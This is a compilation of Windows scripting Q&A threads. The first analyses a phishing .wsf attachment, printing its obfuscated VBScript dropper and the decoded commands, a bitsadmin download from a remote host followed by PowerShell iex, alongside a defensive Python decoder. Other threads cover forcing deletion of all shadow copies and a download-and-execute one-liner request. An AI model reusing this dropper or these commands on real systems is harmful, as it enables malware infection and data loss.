Is this VB script potentially dangerous? - vbscript

This morning I received a mail containing, among other things, a file with the extension .wsf, on which I inadvertently clicked.
I immediately realized that I had made a mistake ... but too late :(
Can you tell me if it is malicious code?
Here is the code:
<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next
</script></job></package>
Thank you!

The fact it obfuscates itself is a good indicator it may be malicious. If you want to see what it's attempting to run you can:
Comment out this line (like below):
'ISUaUv.run KcSOUa,false,-1
Add this line below it:
WScript.Echo KcSOUa
When you run the script you will get this output:
Output:
powershell -c ""&bitsadmin /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell -c & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex
Judging by the first line, the script is using the BITSAdmin service (built into Windows) to initiate a download from the remote URL into a local XLS file stored inside your user profile AppData folder. As for the second, I'm not clear on what that does but someone with more PowerShell knowledge will be able to shed light on it.
Update
It looks to be using gc (Get-Content applet in PowerShell) to pull the content of the file into a string using the Out-String command. It then pipes this to iex (Invoke-Expression command) to be executed.
The likelihood is the inter.xls file that was downloaded contains malicious commands that are then being locally executed in the context of the local system. This is a classic script kiddie hack to get around remote code execution.
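The swap of `run` for `Echo` above still means executing the attacker's script under a script host. The same result can be recovered without running it, because the loop is a fixed transformation: the payload string is split on the literal `dev`, every segment has 4 subtracted from each character code (`chr(Asc(c)+0-4)`), and each result is prepended, which reverses the segment. The Python below is an added example, not code from the thread: it reproduces that transformation offline and runs a small indicator check over the recovered commands. It assumes the victim's ANSI code page is Windows-1252 (VBScript's `Asc()` returns the ANSI value, so the `€` in the blob is byte 0x80 and decodes to `|`), and its sample blob is constructed with the same scheme so that it decodes to harmless commands; paste the string from the message into `decode_payload()` to reproduce the two output lines shown in the answer.

```python
"""Static decoder for the shift-and-reverse obfuscation in the .wsf above.

Added example, not part of the original post. The script splits its
payload on the literal separator "dev", then, for each segment, subtracts
4 from every character code (VBScript Asc() returns the ANSI code page
value, assumed here to be Windows-1252) and prepends each result, which
reverses the segment. Reproducing that offline recovers the commands
without ever handing them to WScript.Shell.run.
"""
import re

SEPARATOR = "dev"   # literal used in split(jpHg, "dev")
SHIFT = 4           # chr(Asc(c) + 0 - 4)

# Substrings a triage analyst would flag in recovered commands
# (constructed list, based on what the decoded sample in the answer used).
INDICATORS = {
    "powershell": re.compile(r"\bpowershell\b", re.I),
    "bitsadmin /transfer": re.compile(r"\bbitsadmin\b.*/transfer", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "appdata staging": re.compile(r"%appdata%", re.I),
    "remote url": re.compile(r"https?://", re.I),
}


def vbs_asc(ch: str, codepage: str = "cp1252") -> int:
    """Emulate VBScript Asc(): the ANSI code-page byte of the character.
    '€' is 0x80 in cp1252, so Asc("€") - 4 = 0x7C = '|', which is how the
    blob encodes a pipe. The code page is an assumption about the victim
    machine; change it if the locale differs."""
    return ch.encode(codepage)[0]


def decode_segment(segment: str) -> str:
    """Undo one segment: shift every character down by SHIFT, prepending
    (as the VBScript loop does), which reverses the text."""
    out = ""
    for ch in segment:
        out = chr(vbs_asc(ch) - SHIFT) + out
    return out


def decode_payload(blob: str) -> list[str]:
    """Return every command the script would have executed, in order."""
    return [decode_segment(seg) for seg in blob.split(SEPARATOR)]


def triage(command: str) -> list[str]:
    """Names of INDICATORS that match a recovered command."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


# Constructed sample obfuscated with the same scheme: two segments that
# decode to 'powershell -c iex' and 'whoami | more'. It is NOT the blob
# from the message; feed that to decode_payload() to recover its commands.
SAMPLE = "|im$g1$ppilwvi{st" + SEPARATOR + "ivsq$€$mqesl{"

if __name__ == "__main__":
    for cmd in decode_payload(SAMPLE):
        print(repr(cmd), "->", triage(cmd) or "no indicators")
```

Decoding statically also sidesteps the other trap in the `Echo` approach: a dropper that does something else before the `run` line (or that detects a script host with no console) still gets to execute that part.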

Related

Windows Server 2003: Task Scheduler is not running successfully VBS file jobs

We have an old Windows Server 2003 R2 which is doing nothing but using the task scheduler and a VBS file to check and rename some regularly re-occurring data files. It is set up to run every hour using my credentials. If I "run" it while I'm logged on the task runs and completes correctly. When no one is logged on the task runs but completes with a 0x1 code, i.e. it failed.
I have checked the event logs and see nothing which I can identify as an error or failure. We believe that it was running successfully until about 6-8 months ago (yes, it was one of those set it up and forget it things and we have not been regularly checking it).
=================Additional Information===============
I ran assoc .vbs and got this output: .vbs=VBSFile
I'm not sure how to determine the user environment variables?
For the task I have tried both the vbs file and also a bat file containing the reference to the vbs file. Both run when I'm logged on and both fail to complete successfully when I'm not.
Here is the vbs script:
Dim fso, file, recentDate, recentFile, theFile, myfolder, mypath
set fso = CreateObject("Scripting.FileSystemObject")
set recentFile = Nothing
mypath = "D:\TheFTP\Main\Camera\lobby"
set myfolder = fso.GetFolder(mypath)
For Each file in myfolder.Files
If (recentFile is Nothing) Then
set recentFile = file
ElseIf (file.DateLastModified > recentFile.DateLastModified) Then
set recentFile = file
End If
Next
fso.CopyFile mypath & "\" & recentFile.name, "D:\TheFTP\main\camera\cam3.jpg"
set recentFile = nothing
set fso = nothing
Here is the last bat file where I have piped the output to a file:
C:\windows\system32\cscript.exe c:\CopyWebCamFile.vbs > c:\debug.txt
Debug.txt output when I'm not logged on shows an error, see below, which is not there when I run it and am logged on:
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
CScript Error: Initialization of the Windows Script Host failed. (The system cannot find the file specified.
=====================================================
More information: I added several Wscript.Echo statements to my script, before the first line, after the FOR loop and before the "copyFile" command. When I'm logged on I see all of the output in C:\debug.txt. When NOT logged on I see the same above error message, i.e. no Wscript.Echo output. This would seem to indicate that it cannot find my vbs file when I'm not logged on.
===========================
Still no happiness here. I moved and modified the .bat file to also output the contents of the script file:
type H:\Task_Stuff\CopyWebCamFileTest.vbs > H:\Task_Stuff\debug2.txt
C:\windows\system32\cscript.exe H:\Task_Stuff\CopyWebCamFileTest.vbs > H:\Task_Stuff\debug.txt
As before I get output to both .txt files when it runs while I'm logged on and nothing in debug2.txt and the usual messages in debug.txt when I'm not.
I'll fiddle with the antivirus settings, but I need to ask about that first. We are using Symantec SEP.
How can I check on the user environment variables?
====================
Maybe this will clarify my problem or suggest a solution??
Can you offer any ideas...RDK
First off we would like to thank LeeHarvey1 for his time and suggestions as we searched for the cause of this issue. In the end it was one of his suggestions that fixed the problem, but we still have no idea what caused it.
A reboot of the system cleared up all of the issues surrounding the task scheduler and running VB Scripts! We had considered his early suggestion, but discounted it as this server had only been up for a little over 3 months. Not excessive in our experience. However, when all else failed we elected to do that and "voila" it fixed the issue. We wish we knew what caused it but are now just happy we can move on to other things.
Thanks again LeeHarvey1....

What does the regserver argument to cscript/wscript do?

I have seen mentions in other places to a -regserver argument to cscript or wscript - but can't find any info that precisely defines what this option does or really clarifies when you'd want/need to use it.
Even the built-in help does not mention it:
λ cscript /?
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
Usage: CScript scriptname.extension [option...] [arguments...]
Options:
//B Batch mode: Suppresses script errors and prompts from displaying
//D Enable Active Debugging
//E:engine Use engine for executing script
//H:CScript Changes the default script host to CScript.exe
//H:WScript Changes the default script host to WScript.exe (default)
//I Interactive mode (default, opposite of //B)
//Job:xxxx Execute a WSF job
//Logo Display logo (default)
//Nologo Prevent logo display: No banner will be shown at execution time
//S Save current command line options for this user
//T:nn Time out in seconds: Maximum time a script is permitted to run
//X Execute script in debugger
//U Use Unicode for redirected I/O from the console
and nor does Microsoft's documentation.
Note - I gather from some of the external articles I linked to that this option can be used to recover from some bugs in Windows XP and maybe also Vista. But that doesn't actually explain what this option DOES or why it exists. I don't think Microsoft added it after the fact as a FIX, but rather people could take advantage of it to address whatever those problems were in XP/Vista.
EDIT: Just because two questions have same/similar answers does not make them duplicates. The same information can answer multiple different questions. The question referred to as a potential duplicate doesn't have anything to do with the scripting executables. The value of THIS question is that someone using those tools can actually search and find an answer. They will not readily find the other one (as I did not when extensively searching/Googling before I posted this).
These are not actually unique arguments to cscript or wscript; rather they are standard arguments in Windows to any EXE which can act as a COM server.
See this related question for more details of how they operate: https://superuser.com/questions/1164298/what-actually-happens-during-regserver-unregserver
This is at least partly documented here:
If the server is packaged in an EXE module, the application wishing to register the server launches the EXE server with the command-line argument /RegServer or -RegServer (case-insensitive). If the application wishes to unregister the server, it launches the EXE with the command-line argument /UnregServer or -UnregServer.
The self-registering EXE detects these command-line arguments and invokes the same operations as a DLL would within DllRegisterServer and DllUnregisterServer, respectively, registering its module path under LocalServer32 instead of InprocServer32 or InprocHandler32.

Using external executable within powershell

I am new to programming and need some help. I need to write a PowerShell script, and as part of it it needs to run an external executable. However, I am having issues with the script not asking for an argument, and even if I pass one it just seems to wait without asking anything. So here is the part in question:
#Part of my script
$app = "D:\project1\files\vshadow.exe"
$arg1 = "-da"
$arg2 = "Y"
& $app $arg1 $arg2v
+++++++++++++++++++++++++++++++++++++
This is what I get in the console
PS D:\project1\files> C:\Users\Administrator\Desktop\test.ps1
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
+++++++++++++++++++++++++++++
So the .exe is to clear volume shadow copies with a -da flag (clear all); however, the step requires a Y to continue. This is when I run from cmd.exe:
D:\project1\files>vshadow.exe -da
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
This will delete all shadow copies in the system. Are you sure? [Y/N]
++++++++++++++++++++++++++++++
any help would be appreciated
Thanks,
Tom
Its doc says -da requires confirmation but does not provide a way to override. You might be able to pipe in the user input... Try this -
echo 'y' | cmd.exe /c vshadow.exe -da
I do not know of PowerShell being able to act like an Expect script.
That said, you may be able to get around the user input requirement of the -da option. Use a vshadow query to get all copies, then pipe to a foreach loop to do a vshadow delete (-ds).

windows batch command to determine working directory of a process

Why I ask is that my program uses 3rd party software that sometimes leaves behind orphan processes that have no link back to my program or the 3rd party process. These orphan processes start to add up and consume tons of resources over time. I would like to kill them off periodically, but in order for me to do that, I need to know for sure they were created by my program and not some other program. I have viewed the orphan processes in Process Explorer and when looking at the properties of the process, I see a field called "Current Directory". The current directory for the orphaned process is the install directory of my program. This would give me reassurance I am killing a process created by my program.
Since these processes are created by a 3rd party, I need to just kill them after they are created by running taskkill on them or something. Is there a way to figure out the current working directory of a process using out of the box windows commands in a batch file? If this can be done through wmic queries that would be preferable, but I cannot seem to find the current working directory when using wmic. I assume if Process Explorer is able to obtain this info, I should be able to get it too through some batch commands.
tlist from WDK to the rescue! The 2nd line of its output ("CWD: ...") shows the working directory of a process:
> tlist 944
944 postgres.exe
CWD: D:\Lab\Database\pgsql\test\
CmdLine: "D:/Tools/pgsql/bin/postgres.exe" -D "."
VirtualSize: 221116 KB PeakVirtualSize: 242620 KB
WorkingSetSize: 17076 KB PeakWorkingSetSize: 19336 KB
NumberOfThreads: 4
9084 Win32StartAddr:0x00000000 LastErr:0x00000000 State:Waiting
8504 Win32StartAddr:0x00000000 LastErr:0x000000b7 State:Waiting
8616 Win32StartAddr:0x00000000 LastErr:0x00000000 State:Waiting
7468 Win32StartAddr:0x00000000 LastErr:0x00000000 State:Waiting
9.3.5.14202 shp 0x0000000000400000 D:\Tools\pgsql\bin\postgres.exe
6.1.7601.18247 shp 0x00000000770D0000 C:\Windows\SYSTEM32\ntdll.dll
...
See the doc for more info.
Handle is a utility that displays information about open handles for any process in the system. You can use it to see the programs that have a file open, or to see the object types and names of all the handles of a program.
Its GUI-based version is Process Explorer .
handle -p yourProcess.exe > log.txt
It'll list all handles for yourProcess.exe in log file and now using batch command you can easily extract 'current working directory' of yourProcess from log.txt.
added by barlop
Here is the output for process c:\tinyweb\tiny.exe run from c:\tinyweb\rrr:
C:\Users\user>handle -p tiny.exe
Nthandle v4.1 - Handle viewer
Copyright (C) 1997-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
------------------------------------------------------------------------------
tiny.exe pid: 20668 compA\user
10: File C:\Windows
1C: File C:\tinyweb\rrr
9C: File C:\tinyweb\rrr\access_log
A0: File C:\tinyweb\rrr\agent_log
A4: File C:\tinyweb\rrr\error_log
A8: File C:\tinyweb\rrr\referer_log
E4: Section \Sessions\1\BaseNamedObjects\__wmhr_msgs_buffer_name$1e74
EC: File C:\Windows\winsxs\x86_microsoft.windows.common-controls_659
C:\Users\user>
If you want to parse it specifically then you could do it in pure cmd.exe with e.g. for /f, or with a third party scripting language like ruby, or with windows ports of various *nix style command line tools. This line uses such tools and gets it (obviously the following line requires grep and sed, preferably decent versions of them e.g. from cygwin)
C:\Users\harvey>handle -p tiny.exe | grep "pid:" -A 3 | sed -n "3p" | grep -o ".:[\]\S*"
C:\tinyweb\rrr
The following will work, though you only need "CommandLine" or "ExecutablePath" - not both:
wmic process where "ProcessID=1111" get CommandLine, ExecutablePath
It will return something like the following, showing where the program for PID 1111 is running:
"C:\Program Files (x86)\Common Files\MyProgram\Agent\agent.exe"
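The `sed -n "3p"` one-liner above depends on the working directory always being the third handle listed, which is not guaranteed. The Python below is an added example (not from any of the answers) that parses the two output formats quoted in this thread instead: the `CWD:` line of `tlist`, and the per-process handle table of `handle -p`, where the working directory shows up as an open `File` handle on a directory that other open files live under. It also implements the check the question actually wants, confirming that a process holds a handle on a given install directory before it is considered for `taskkill`. The sample outputs are constructed from the ones quoted above, trimmed, and the parsers assume that layout.

```python
"""Parse tlist and handle output to recover a process's working directory.

Added example, not from the original answers. TLIST_SAMPLE and
HANDLE_SAMPLE are constructed from the outputs quoted in the thread.
"""
import re

TLIST_SAMPLE = """\
944 postgres.exe
   CWD:     D:\\Lab\\Database\\pgsql\\test\\
   CmdLine: "D:/Tools/pgsql/bin/postgres.exe" -D "."
   VirtualSize:     221116 KB   PeakVirtualSize:     242620 KB
   WorkingSetSize:   17076 KB   PeakWorkingSetSize:   19336 KB
   NumberOfThreads: 4
"""

HANDLE_SAMPLE = """\
Nthandle v4.1 - Handle viewer
Copyright (C) 1997-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
------------------------------------------------------------------------------
tiny.exe pid: 20668 compA\\user
   10: File          C:\\Windows
   1C: File          C:\\tinyweb\\rrr
   9C: File          C:\\tinyweb\\rrr\\access_log
   A0: File          C:\\tinyweb\\rrr\\agent_log
   E4: Section       \\Sessions\\1\\BaseNamedObjects\\__wmhr_msgs_buffer_name$1e74
"""


def parse_tlist(text: str) -> dict:
    """Return pid, image, cwd and cmdline from `tlist <pid>` output.
    Splitting on the first ':' keeps drive letters ('D:\\...') intact."""
    lines = text.splitlines()
    m = re.match(r"\s*(\d+)\s+(\S+)", lines[0])
    info = {"pid": int(m.group(1)), "image": m.group(2), "cwd": None, "cmdline": None}
    for line in lines[1:]:
        key, sep, val = line.strip().partition(":")
        if not sep:
            continue
        if key == "CWD":
            info["cwd"] = val.strip()
        elif key == "CmdLine":
            info["cmdline"] = val.strip()
    return info


PROC_LINE = re.compile(r"^(\S+)\s+pid:\s+(\d+)\s+(\S+)")
HANDLE_LINE = re.compile(r"^\s*([0-9A-Fa-f]+):\s+(\S+)\s+(\S.*?)\s*$")


def parse_handle(text: str) -> list[dict]:
    """Parse `handle -p <image>` output into one record per process:
    {'image', 'pid', 'user', 'handles': [(id, type, name), ...]}."""
    records, current = [], None
    for line in text.splitlines():
        m = PROC_LINE.match(line)
        if m:
            current = {"image": m.group(1), "pid": int(m.group(2)),
                       "user": m.group(3), "handles": []}
            records.append(current)
            continue
        m = HANDLE_LINE.match(line)
        if m and current is not None:
            current["handles"].append((m.group(1), m.group(2), m.group(3)))
    return records


def file_handles(record: dict) -> list[str]:
    return [name for _, typ, name in record["handles"] if typ == "File"]


def directory_handles(record: dict) -> list[str]:
    """File handles that other open File handles live underneath. The
    working directory (1C: above) is found this way; a directory handle
    with no open children (10: C:\\Windows) is deliberately not reported,
    since nothing in the listing proves it is a directory."""
    files = file_handles(record)
    return [d for d in files
            if any(f.lower().startswith(d.lower().rstrip("\\") + "\\")
                   for f in files if f != d)]


def runs_from(record: dict, install_dir: str) -> bool:
    """True when the process holds an open handle on install_dir itself,
    the check the question wants before killing an orphan."""
    target = install_dir.rstrip("\\").lower()
    return any(name.rstrip("\\").lower() == target for name in file_handles(record))


if __name__ == "__main__":
    print(parse_tlist(TLIST_SAMPLE))
    for rec in parse_handle(HANDLE_SAMPLE):
        print(rec["image"], rec["pid"], directory_handles(rec),
              runs_from(rec, "C:\\tinyweb\\rrr\\"))
```

`runs_from` compares the install directory against the handle list rather than against whichever line `sed` picks, so a process that happens to open an extra file before its working directory no longer defeats the check.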

Shortest command to download and execute a file on Windows?

I am looking for the shortest command that would download a file (http) and execute it on Windows.
We assume that the user executing the command is local Administrator and that you cannot use any tools that are not available by default on Windows.
It must work with: Windows 7 and Windows 2008. Extra kudos if someone gives a solution that also works with Windows XP and Windows 2003.
Reasoning: this is for deploying stuff on different Windows machines. Using WMI or other methods is not an option because these are not enabled by default and also because machines can be inside or outside a domain, which makes the problem more complex.
Note: If this cannot be done in a command line, a script will do. Let's assume that the file to be downloaded is located at "http://example.com/setup.exe" and that you want to run it with "-y" parameter after it is downloaded.
You specified http, so using ftp command in command line would not be ok? Maybe cscript + VB then?
To download file:
https://serverfault.com/questions/29707/download-file-from-vbscript
To run file:
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run (strHDLocation & "-y")